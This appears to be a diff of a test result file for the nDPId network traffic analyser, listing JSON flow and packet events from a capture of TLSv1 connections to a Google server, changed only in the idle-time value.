-00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mDAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAASAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mGAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhgD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mFAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhQD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} 
-00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mEAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mHAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAAAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mDAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAASAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mGAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhgD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} 
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mFAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhQD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} +00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mEAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": 
{"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"8eae3e18d36ce24c4ac6b9eeb84ac762","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mHAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAAAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} 
+00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51591,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
